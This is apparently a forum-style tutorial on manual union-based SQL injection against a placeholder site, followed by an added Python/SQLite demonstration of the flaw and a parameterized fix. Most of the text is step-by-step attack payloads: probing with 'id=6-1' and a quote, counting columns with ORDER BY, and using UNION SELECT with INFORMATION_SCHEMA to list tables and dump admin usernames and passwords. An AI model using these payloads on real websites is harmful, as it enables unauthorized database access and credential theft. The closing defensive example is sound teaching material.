Manual SQL Injection

gkgrsnkzlcksn

Let our target site be xx.com. Let's first check whether the site has a SQL injection vulnerability.

xx.com/news.php?id=5
Let's say the page content contains a topic titled News-1.

xx.com/news.php?id=6
Let's say the page content contains a topic titled News-2.

xx.com/news.php?id=6-1
When we do this and load the page, if our topic titled News-1 appears, it means the site is open to SQL injection: the subtraction was carried out inside the SQL query. If the site has SQL injection protection, the topic titled News-2 should appear.


The first method may not always work. The second method is to put a quotation mark ( ' ) at the end of the query and look for the SQL error on the screen. Admins of some websites hide the error messages with error_reporting(0). So is that an obstacle? No. If you enter the parameters correctly, you can still carry out your SQL injection operations successfully.

xx.com/news.php?id=5'



Now let's find our column count. What is this column count?
For example, there is a table called news in the database, and this table has only 7 columns. Here we will try to find that number of columns (7).

xx.com/news.php?id=5'+order+by+1+--+-

We load the site with this parameter. The page content will not change. We increase the number 1 one by one until the page gives an error or a blank page appears.

xx.com/news.php?id=5'+order+by+8+--+-

We saw that our page gave an error. This means that our column number is 7. Now let's print our column numbers on the screen.

xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,4,5,6,7+--+-

Some of the column numbers, e.g. 3, 5, 7, will appear in the page content. We will pick one of them and get our database name.

xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,database(),5,6,7+--+-

I chose the number 4, deleted it from the parameter and wrote database() in its place. The name of the database appears in the page content where the number 4 was. As an example, say our database name is illegalplatform_whiz.

We go to an online hex encoder site and encode our database name as hex:
illegalplatform_whiz = 696C6C6567616C706C6174666F726D5F7768697A

Now let's pull our tables.
xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x696C6C6567616C706C6174666F726D5F7768697A),5,6,7+--+-

The area I marked in green is the database name we encoded, the area I marked in yellow is the parameter I added afterwards, and the tables of the database appear in the page content. For example, the resulting tables are admin, news, users. Now we pull the column names of the admin table, encoding the name admin as hex again.

admin = 61646D696E

xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e),5,6,7+--+-

Likewise, the parameter I added afterwards, marked in yellow, is the hex-encoded version of the name admin, marked in green. The column names of the admin table will appear in the page content; as examples, id, username, password. Now let's pull the contents of the columns.

xx.com/news.php?id=5'+and false+UNION+ALL+SELECT+1,2,3,(SELECT+GROUP_CONCAT(id,username,password+SEPARATOR+0x3c62723e)+FROM+illegalplatform_whiz.admin),5,6,7+--+-

The field I marked in yellow is the column names of the admin table, the field I marked in green is the database name, the field I marked in orange is the table name, and the id, username and password values will appear in the page content joined together, as 1adminadmin.
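Why the id=6-1 check above works, and what closes it, as an added example that is not part of the post: a Python/SQLite stand-in (an assumption; the post's target is a PHP/MySQL site) for a news.php that pastes the id into the query text, beside a version that validates the type and binds the value as a parameter.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the post's news table
    (SQLite instead of MySQL; arithmetic in WHERE and parameter
    binding behave the same way for this demonstration)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(5, "News-1"), (6, "News-2")])
    return conn


def fetch_title_vulnerable(conn, raw_id):
    """news.php as the post assumes it is written: the id parameter is
    concatenated into the SQL text, so 'id=6-1' is evaluated by the
    database as 6-1 and the News-1 row comes back."""
    sql = "SELECT title FROM news WHERE id=" + raw_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def fetch_title_safe(conn, raw_id):
    """Hardened version: reject anything that is not an integer, then
    bind the value as a parameter so it can never become SQL syntax."""
    try:
        news_id = int(raw_id)   # '6-1', "5'", '5 order by 8' all fail here
    except ValueError:
        return None
    row = conn.execute("SELECT title FROM news WHERE id=?", (news_id,)).fetchone()
    return row[0] if row else None


def probe(fetch, conn, raw_id):
    """Report what a visitor would see for one id value: a title,
    an empty page (None), or a database error."""
    try:
        return fetch(conn, raw_id)
    except sqlite3.Error:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for value in ("5", "6", "6-1", "5'"):
        print(f"id={value!r:10} vulnerable={probe(fetch_title_vulnerable, db, value)!r:10} "
              f"safe={probe(fetch_title_safe, db, value)!r}")
```

With the concatenating version, id=6-1 returns News-1 and a trailing quote produces a database error, exactly the two signals the post looks for; with the bound parameter both inputs simply yield an empty page.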